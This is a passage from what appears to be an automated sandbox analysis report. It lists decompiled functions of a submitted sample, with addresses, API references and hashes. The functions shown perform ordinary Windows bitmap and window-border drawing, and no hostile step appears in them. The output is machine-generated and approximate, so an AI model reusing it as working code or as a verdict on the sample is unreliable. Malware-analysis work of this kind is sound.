				_t267 =  *(_t255 + 0x20) * 0;
				L0041D8CC(_v12,  *(_t255 + 0x20) * 0, _v32);
				_t331 = _t330 -  *(_t255 + 0x20) * 0;
				if( *(_t255 + 0x14) == 0) {
					_t307 =  *(_t255 + 0xe) & 0x0000ffff;
					_t218 = E004261F0( *((intOrPtr*)(_t255 + 4)), 0x20, _t307);
					asm("cdq");
					_t267 = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
					 *(_t255 + 0x14) = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
				}
				_t160 =  *(_t255 + 0x14);
				if(_t331 > _t160) {
					_t331 = _t160;
				}
				if(_v37 != 0) {
					E00426498(_v32);
				}
				_v16 = E00426060(GetDC(0));
				_push(_t333);
				_push(0x42a97b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				_t164 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t164 == 0 || _t164 == 3) {
					if( *0x49b620 == 0) {
						_v44 = CreateDIBSection(_v16, _v28, 0,  &_v24, 0, 0);
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040E79C(_t255, _t267, _t327, _t331);
							} else {
								L00425F40();
							}
						}
						_push(_t333);
						_push( *[fs:eax]);
						 *[fs:eax] = _t335;
						L0041D8CC(_v12, _t331, _v24);
						_pop(_t299);
						 *[fs:eax] = _t299;
						_t300 = 0x42a94a;
						 *[fs:eax] = _t300;
						_push(0x42a982);
						return ReleaseDC(0, _v16);
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E0040275C(_t331);
					_push(_t333);
					_push(0x42a8e3);
					_push( *[fs:edx]);
					 *[fs:edx] = _t335;
					_t273 = _t331;
					L0041D8CC(_v12, _t331, _v24);
					_v20 = E00426060(CreateCompatibleDC(_v16));
					_v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1));
					_v56 = 0;
					_t193 =  *(_v64 + 0x20);
					if(_t193 > 0) {
						_t273 = _t193;
						_v52 = E00426750(0, _t193);
						_v56 = SelectPalette(_v20, _v52, 0);
						RealizePalette(_v20);
					}
					_push(_t333);
					_push(0x42a8b7);
					_push( *[fs:edx]);
					 *[fs:edx] = _t335;
					_v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0);
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040E79C(_t255, _t273, _t327, _t331);
						} else {
							L00425F40();
						}
					}
					_pop(_t305);
					 *[fs:eax] = _t305;
					_push(0x42a8be);
					if(_v56 != 0) {
						SelectPalette(_v20, _v56, 0xffffffff);
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}














































                                                    0x0042a510
                                                    0x0042a511
                                                    0x0042a513
                                                    0x0042a51c
                                                    0x0042a51e
                                                    0x0042a521
                                                    0x0042a526
                                                    0x0042a52b
                                                    0x0042a530
                                                    0x0042a540
                                                    0x0042a547
                                                    0x0042a54f
                                                    0x0042a551
                                                    0x0042a551
                                                    0x0042a568
                                                    0x0042a56e
                                                    0x0042a573
                                                    0x0042a574
                                                    0x0042a579
                                                    0x0042a57c
                                                    0x0042a581
                                                    0x0042a582
                                                    0x0042a587
                                                    0x0042a58a
                                                    0x0042a591
                                                    0x0042a5f0
                                                    0x0042a5f3
                                                    0x0042a5f9
                                                    0x0042a5ff
                                                    0x0042a619
                                                    0x0042a620
                                                    0x0042a62f
                                                    0x0042a634
                                                    0x0042a642
                                                    0x0042a64e
                                                    0x0042a64e
                                                    0x0042a65e
                                                    0x0042a66e
                                                    0x0042a682
                                                    0x0042a691
                                                    0x0042a6a3
                                                    0x0042a6a9
                                                    0x0042a6a9
                                                    0x0042a593
                                                    0x0042a5a3
                                                    0x0042a5a6
                                                    0x0042a5b2
                                                    0x0042a5b7
                                                    0x0042a5bd
                                                    0x0042a5c4
                                                    0x0042a5cb
                                                    0x0042a5d3
                                                    0x0042a5d7
                                                    0x0042a5d7
                                                    0x0042a6ac
                                                    0x0042a6b2
                                                    0x0042a6ba
                                                    0x0042a6c2
                                                    0x0042a6c4
                                                    0x0042a6c4
                                                    0x0042a6cd
                                                    0x0042a6cf
                                                    0x0042a6d7
                                                    0x0042a6e3
                                                    0x0042a6f0
                                                    0x0042a6f5
                                                    0x0042a6f9
                                                    0x0042a6f9
                                                    0x0042a6e3
                                                    0x0042a6d7
                                                    0x0042a700
                                                    0x0042a70b
                                                    0x0042a70b
                                                    0x0042a711
                                                    0x0042a71d
                                                    0x0042a726
                                                    0x0042a738
                                                    0x0042a73e
                                                    0x0042a740
                                                    0x0042a74c
                                                    0x0042a756
                                                    0x0042a75b
                                                    0x0042a75e
                                                    0x0042a75e
                                                    0x0042a761
                                                    0x0042a766
                                                    0x0042a768
                                                    0x0042a768
                                                    0x0042a76e
                                                    0x0042a773
                                                    0x0042a773
                                                    0x0042a784
                                                    0x0042a789
                                                    0x0042a78a
                                                    0x0042a78f
                                                    0x0042a792
                                                    0x0042a798
                                                    0x0042a79d
                                                    0x0042a7ab
                                                    0x0042a901
                                                    0x0042a908
                                                    0x0042a917
                                                    0x0042a920
                                                    0x0042a919
                                                    0x0042a919
                                                    0x0042a919
                                                    0x0042a917
                                                    0x0042a927
                                                    0x0042a92d
                                                    0x0042a930
                                                    0x0042a93b
                                                    0x0042a942
                                                    0x0042a945
                                                    0x0042a964
                                                    0x0042a967
                                                    0x0042a96a
                                                    0x0042a97a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0042a7b1
                                                    0x0042a7b1
                                                    0x0042a7b3
                                                    0x0042a7bd
                                                    0x0042a7c2
                                                    0x0042a7c3
                                                    0x0042a7c8
                                                    0x0042a7cb
                                                    0x0042a7d1
                                                    0x0042a7d6
                                                    0x0042a7e9
                                                    0x0042a803
                                                    0x0042a808
                                                    0x0042a80e
                                                    0x0042a813
                                                    0x0042a815
                                                    0x0042a821
                                                    0x0042a833
                                                    0x0042a83a
                                                    0x0042a83a
                                                    0x0042a841
                                                    0x0042a842
                                                    0x0042a847
                                                    0x0042a84a
                                                    0x0042a863
                                                    0x0042a86a
                                                    0x0042a873
                                                    0x0042a87c
                                                    0x0042a875
                                                    0x0042a875
                                                    0x0042a875
                                                    0x0042a873
                                                    0x0042a883
                                                    0x0042a886
                                                    0x0042a889
                                                    0x0042a892
                                                    0x0042a89e
                                                    0x0042a89e
                                                    0x0042a8b6
                                                    0x0042a8b6

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0042A77A
                                                    • CreateCompatibleDC.GDI32(00000001), ref: 0042A7DF
                                                    • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0042A7F4
                                                    • SelectObject.GDI32(?,00000000), ref: 0042A7FE
                                                    • SelectPalette.GDI32(?,?,00000000), ref: 0042A82E
                                                    • RealizePalette.GDI32(?), ref: 0042A83A
                                                    • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 0042A85E
                                                    • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042A86C
                                                    • SelectPalette.GDI32(?,00000000,000000FF), ref: 0042A89E
                                                    • SelectObject.GDI32(?,?), ref: 0042A8AB
                                                    • DeleteObject.GDI32(00000000), ref: 0042A8B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                                    • String ID: ($BM
                                                    • API String ID: 2831685396-2980357723
                                                    • Opcode ID: 496f69271fb9ccee439b3da71489c37b304fc4bf0672b7fc97fcd75c0970043d
                                                    • Instruction ID: 25b6b903fc63a4d1ab3304e11741f41bc99333438c5c48279b365a0d6610163c
                                                    • Opcode Fuzzy Hash: 496f69271fb9ccee439b3da71489c37b304fc4bf0672b7fc97fcd75c0970043d
                                                    • Instruction Fuzzy Hash: A8D14C74F002189FDB04EFA9D885BAEBBB5FF48304F54846AE904E7391D7389851CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00426070 Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E00426070(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				struct HBITMAP__* _v20;
				struct HDC__* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				void* _t78;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t91;
				void* _t93;
				void* _t94;
				intOrPtr _t95;

				_t93 = _t94;
				_t95 = _t94 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t77 = __ecx;
				_v8 = __eax;
				_v28 = CreateCompatibleDC(0);
				_v32 = CreateCompatibleDC(0);
				_push(_t93);
				_push(0x4261be);
				_push( *[fs:eax]);
				 *[fs:eax] = _t95;
				GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_v24 = GetDC(0);
					if(_v24 == 0) {
						L00425FB8(_t77);
					}
					_push(_t93);
					_push(0x42612d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t95;
					_v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
					if(_v20 == 0) {
						L00425FB8(_t77);
					}
					_pop(_t85);
					 *[fs:eax] = _t85;
					_push(0x426134);
					return ReleaseDC(0, _v24);
				} else {
					_v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
					if(_v20 != 0) {
						_t78 = SelectObject(_v28, _v8);
						_t91 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t78 != 0) {
							SelectObject(_v28, _t78);
						}
						if(_t91 != 0) {
							SelectObject(_v32, _t91);
						}
					}
					_pop(_t86);
					 *[fs:eax] = _t86;
					_push(0x4261c5);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}




















                                                    0x00426071
                                                    0x00426073
                                                    0x0042607e
                                                    0x0042607f
                                                    0x00426080
                                                    0x00426082
                                                    0x0042608c
                                                    0x00426096
                                                    0x0042609b
                                                    0x0042609c
                                                    0x004260a1
                                                    0x004260a4
                                                    0x004260b1
                                                    0x004260b8
                                                    0x004260d9
                                                    0x004260e0
                                                    0x004260e2
                                                    0x004260e2
                                                    0x004260e9
                                                    0x004260ea
                                                    0x004260ef
                                                    0x004260f2
                                                    0x00426106
                                                    0x0042610d
                                                    0x0042610f
                                                    0x0042610f
                                                    0x00426116
                                                    0x00426119
                                                    0x0042611c
                                                    0x0042612c
                                                    0x004260ba
                                                    0x004260cd
                                                    0x00426138
                                                    0x00426147
                                                    0x00426156
                                                    0x0042617d
                                                    0x00426184
                                                    0x0042618b
                                                    0x0042618b
                                                    0x00426192
                                                    0x00426199
                                                    0x00426199
                                                    0x00426192
                                                    0x004261a0
                                                    0x004261a3
                                                    0x004261a6
                                                    0x004261af
                                                    0x004261bd
                                                    0x004261bd

                                                    APIs
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00426087
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00426091
                                                    • GetObjectA.GDI32(?,00000018,?), ref: 004260B1
                                                    • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 004260C8
                                                    • GetDC.USER32(00000000), ref: 004260D4
                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00426101
                                                    • ReleaseDC.USER32 ref: 00426127
                                                    • SelectObject.GDI32(?,?), ref: 00426142
                                                    • SelectObject.GDI32(?,00000000), ref: 00426151
                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0042617D
                                                    • SelectObject.GDI32(?,00000000), ref: 0042618B
                                                    • SelectObject.GDI32(?,00000000), ref: 00426199
                                                    • DeleteDC.GDI32(?), ref: 004261AF
                                                    • DeleteDC.GDI32(?), ref: 004261B8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                    • String ID:
                                                    • API String ID: 644427674-0
                                                    • Opcode ID: 96549eea74ed33ff1694cbe071ccede941aae8e18c591fd20771ef1c91b8bae9
                                                    • Instruction ID: 23bfd75d1e5f7ab71a99e75aee45f16e7152ef54e2d5d773258edcec8bfffe0d
                                                    • Opcode Fuzzy Hash: 96549eea74ed33ff1694cbe071ccede941aae8e18c591fd20771ef1c91b8bae9
                                                    • Instruction Fuzzy Hash: 9D411271E04219AFDB10DBE9DC42FAFB7BCEB08704F91446AB604F7281C67869108769
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004424F8 Relevance: 19.7, APIs: 13, Instructions: 224COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 57%
                                                    			E004424F8(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				intOrPtr* _t195;
				intOrPtr* _t198;
				intOrPtr _t207;
				void* _t210;
				intOrPtr _t218;
				signed int _t236;
				void* _t239;
				void* _t241;
				intOrPtr _t242;

				_t239 = _t241;
				_t242 = _t241 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_v16 = GetWindowDC(E00441704(_v8));
					_push(_t239);
					_push(0x44275e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t242;
					GetClientRect(E00441704(_v8),  &_v32);
					GetWindowRect(E00441704(_v8),  &_v48);
					MapWindowPoints(0, E00441704(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t210 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t210 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t210 = _t210 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t236 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t210;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t210;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t210;
						}
						if((_t236 & 0x00200000) != 0) {
							_t198 =  *0x49d970; // 0x49e900
							_v48.right = _v48.right +  *((intOrPtr*)( *_t198))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t210;
						}
						if((_t236 & 0x00100000) != 0) {
							_t195 =  *0x49d970; // 0x49e900
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t195))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x49bcec + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x49bcfc + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x49bd0c + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x49bd1c + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E00425610( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t218);
					 *[fs:eax] = _t218;
					_push(0x442765);
					return ReleaseDC(E00441704(_v8), _v16);
				} else {
					 *((intOrPtr*)( *_v8 - 0x10))();
					_t207 = E004329D8(E004328F8());
					if(_t207 != 0) {
						_t207 = _v8;
						if(( *(_t207 + 0x52) & 0x00000002) != 0) {
							_t207 = E00432F08(E004328F8(), 0, _v8);
						}
					}
					return _t207;
				}
			}


















                                                    0x004424f9
                                                    0x004424fb
                                                    0x00442501
                                                    0x00442504
                                                    0x00442511
                                                    0x00442531
                                                    0x00442536
                                                    0x00442537
                                                    0x0044253c
                                                    0x0044253f
                                                    0x0044254f
                                                    0x00442561
                                                    0x00442577
                                                    0x0044258c
                                                    0x004425a5
                                                    0x004425b0
                                                    0x004425b1
                                                    0x004425b2
                                                    0x004425b3
                                                    0x004425c3
                                                    0x004425ce
                                                    0x004425cf
                                                    0x004425d0
                                                    0x004425d1
                                                    0x004425dc
                                                    0x004425e2
                                                    0x004425ee
                                                    0x004425f3
                                                    0x004425f3
                                                    0x00442603
                                                    0x00442608
                                                    0x00442608
                                                    0x0044261e
                                                    0x0044262a
                                                    0x0044262c
                                                    0x0044262c
                                                    0x00442639
                                                    0x0044263b
                                                    0x0044263b
                                                    0x00442648
                                                    0x0044264a
                                                    0x0044264a
                                                    0x00442653
                                                    0x00442657
                                                    0x00442660
                                                    0x00442660
                                                    0x0044266d
                                                    0x0044266f
                                                    0x0044266f
                                                    0x00442678
                                                    0x0044267c
                                                    0x00442685
                                                    0x00442685
                                                    0x004426e5
                                                    0x004426e5
                                                    0x004426fe
                                                    0x00442709
                                                    0x0044270a
                                                    0x0044270b
                                                    0x0044270c
                                                    0x0044271d
                                                    0x00442739
                                                    0x00442740
                                                    0x00442743
                                                    0x00442746
                                                    0x0044275d
                                                    0x00442765
                                                    0x0044276d
                                                    0x00442775
                                                    0x0044277c
                                                    0x0044277e
                                                    0x00442785
                                                    0x00442791
                                                    0x00442791
                                                    0x00442785
                                                    0x0044279c
                                                    0x0044279c

                                                    APIs
                                                    • GetWindowDC.USER32(00000000), ref: 0044252C
                                                    • GetClientRect.USER32 ref: 0044254F
                                                    • GetWindowRect.USER32 ref: 00442561
                                                    • MapWindowPoints.USER32 ref: 00442577
                                                    • OffsetRect.USER32(?,?,?), ref: 0044258C
                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 004425A5
                                                    • InflateRect.USER32(?,00000000,00000000), ref: 004425C3
                                                    • GetWindowLongA.USER32 ref: 00442619
                                                    • DrawEdge.USER32(?,?,00000000,00000008), ref: 004426E5
                                                    • IntersectClipRect.GDI32(?,?,?,?,?), ref: 004426FE
                                                    • OffsetRect.USER32(?,?,?), ref: 0044271D
                                                    • FillRect.USER32 ref: 00442739
                                                    • ReleaseDC.USER32 ref: 00442758
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$Window$ClipOffset$ClientDrawEdgeExcludeFillInflateIntersectLongPointsRelease
                                                    • String ID:
                                                    • API String ID: 3115931838-0
                                                    • Opcode ID: c56058a07da977805be350d555e5f4c2bc4b18feb5411abbc630dda1f5db6ba1
                                                    • Instruction ID: af5f50b217af5c554848a1b825971ec4031c124bbe34cabe8649f27ab7cee0d4
                                                    • Opcode Fuzzy Hash: c56058a07da977805be350d555e5f4c2bc4b18feb5411abbc630dda1f5db6ba1
                                                    • Instruction Fuzzy Hash: 48911771E04208AFDB01DBA9C985EEEB7F9AF09314F5440A6F504F7252C779AE40DB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00432F08 Relevance: 18.1, APIs: 12, Instructions: 142COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E00432F08(void* __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				char _v56;
				char _v72;
				signed char _t43;
				signed int _t79;
				int _t81;
				void* _t94;
				intOrPtr _t107;
				void* _t116;
				void* _t119;
				void* _t122;
				void* _t124;
				intOrPtr _t125;

				_t122 = _t124;
				_t125 = _t124 + 0xffffffbc;
				_t94 = __ecx;
				_v8 = __edx;
				_t116 = __eax;
				_t43 = GetWindowLongA(E00441704(_v8), 0xffffffec);
				if((_t43 & 0x00000002) == 0) {
					return _t43;
				} else {
					GetWindowRect(E00441704(_v8),  &_v44);
					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
					_v12 = GetWindowDC(E00441704(_v8));
					_push(_t122);
					_push(0x433063);
					_push( *[fs:edx]);
					 *[fs:edx] = _t125;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t119 = _t116;
					if(_t94 != 0) {
						_t79 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
						if((_t79 & 0x00100000) != 0 && (_t79 & 0x00200000) != 0) {
							GetSystemMetrics(2);
							_t81 = GetSystemMetrics(3);
							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
							E00419804(_v28.right, _v28.bottom - _t81,  &_v72, _v28.bottom);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t119 = _t119;
							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
						}
					}
					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
					E00432B40( &_v56, 2);
					E00432A94(_t119,  &_v56, _v12, 0,  &_v44);
					_pop(_t107);
					 *[fs:eax] = _t107;
					_push(0x43306a);
					return ReleaseDC(E00441704(_v8), _v12);
				}
			}



















                                                    0x00432f09
                                                    0x00432f0b
                                                    0x00432f11
                                                    0x00432f13
                                                    0x00432f16
                                                    0x00432f23
                                                    0x00432f2b
                                                    0x00433070
                                                    0x00432f31
                                                    0x00432f3e
                                                    0x00432f53
                                                    0x00432f66
                                                    0x00432f6b
                                                    0x00432f6c
                                                    0x00432f71
                                                    0x00432f74
                                                    0x00432f7e
                                                    0x00432f7f
                                                    0x00432f80
                                                    0x00432f81
                                                    0x00432f82
                                                    0x00432f85
                                                    0x00432f92
                                                    0x00432f9c
                                                    0x00432fa7
                                                    0x00432fb0
                                                    0x00432fbf
                                                    0x00432fd9
                                                    0x00432fe5
                                                    0x00432fe6
                                                    0x00432fe7
                                                    0x00432fe8
                                                    0x00432fe9
                                                    0x00432ffa
                                                    0x00432ffa
                                                    0x00432f9c
                                                    0x0043301f
                                                    0x0043302b
                                                    0x0043303e
                                                    0x00433045
                                                    0x00433048
                                                    0x0043304b
                                                    0x00433062
                                                    0x00433062

                                                    APIs
                                                    • GetWindowLongA.USER32 ref: 00432F23
                                                    • GetWindowRect.USER32 ref: 00432F3E
                                                    • OffsetRect.USER32(?,?,?), ref: 00432F53
                                                    • GetWindowDC.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00432F61
                                                    • GetWindowLongA.USER32 ref: 00432F92
                                                    • GetSystemMetrics.USER32 ref: 00432FA7
                                                    • GetSystemMetrics.USER32 ref: 00432FB0
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00432FBF
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00432FEC
                                                    • FillRect.USER32 ref: 00432FFA
                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00433063,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043301F
                                                    • ReleaseDC.USER32 ref: 0043305D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
                                                    • String ID:
                                                    • API String ID: 19621357-0
                                                    • Opcode ID: 1044420493868e0b4b43c14135ea523b993d5beeeaccf79545e6cca688bac7b0
                                                    • Instruction ID: 04c1fd49532e7d442bf35e743343acee4fdea8649fd85b2f3a22c1a56fe95c6f
                                                    • Opcode Fuzzy Hash: 1044420493868e0b4b43c14135ea523b993d5beeeaccf79545e6cca688bac7b0
                                                    • Instruction Fuzzy Hash: A9415E71E04108ABDB01EAE9CD82EDFB7BDEF49364F100126F904F7291CA78AE418765
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042CAA8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E0042CAA8(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x49e92f != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x49e91c = E0042C4FC(7, _t60,  *0x49e91c, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}















                                                    0x0042cab1
                                                    0x0042cab4
                                                    0x0042cabe
                                                    0x0042caee
                                                    0x0042caf4
                                                    0x0042cbb0
                                                    0x0042cbb8
                                                    0x0042cbb8
                                                    0x0042cafc
                                                    0x0042cb01
                                                    0x0042cb0c
                                                    0x0042cb17
                                                    0x0042cb1c
                                                    0x0042cb85
                                                    0x0042cb9d
                                                    0x0042cbae
                                                    0x0042cb99
                                                    0x0042cb99
                                                    0x0042cb99
                                                    0x00000000
                                                    0x0042cb85
                                                    0x0042cb28
                                                    0x0042cb37
                                                    0x00000000
                                                    0x00000000
                                                    0x0042cb49
                                                    0x0042cb61
                                                    0x0042cb77
                                                    0x00000000
                                                    0x00000000
                                                    0x0042cb7d
                                                    0x0042cb7f
                                                    0x0042cb7f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0042cb61
                                                    0x0042cad2
                                                    0x0042cae7
                                                    0x00000000

                                                    APIs
                                                    • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042CAE1
                                                    • GetSystemMetrics.USER32 ref: 0042CB06
                                                    • GetSystemMetrics.USER32 ref: 0042CB11
                                                    • GetClipBox.GDI32(?,?), ref: 0042CB23
                                                    • GetDCOrgEx.GDI32(?,?), ref: 0042CB30
                                                    • OffsetRect.USER32(?,?,?), ref: 0042CB49
                                                    • IntersectRect.USER32 ref: 0042CB5A
                                                    • IntersectRect.USER32 ref: 0042CB70
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                    • String ID: EnumDisplayMonitors
                                                    • API String ID: 362875416-2491903729
                                                    • Opcode ID: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                    • Instruction ID: 4511490224432de624573bc09b14fa9d255139f998f9dfe8687c617b2a51fe57
                                                    • Opcode Fuzzy Hash: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                    • Instruction Fuzzy Hash: 723101B2E04219AFDB50DFA5E885EFF77BCAB05300F444537ED15E3241D638AA018BA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402A1C Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00402A1C(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
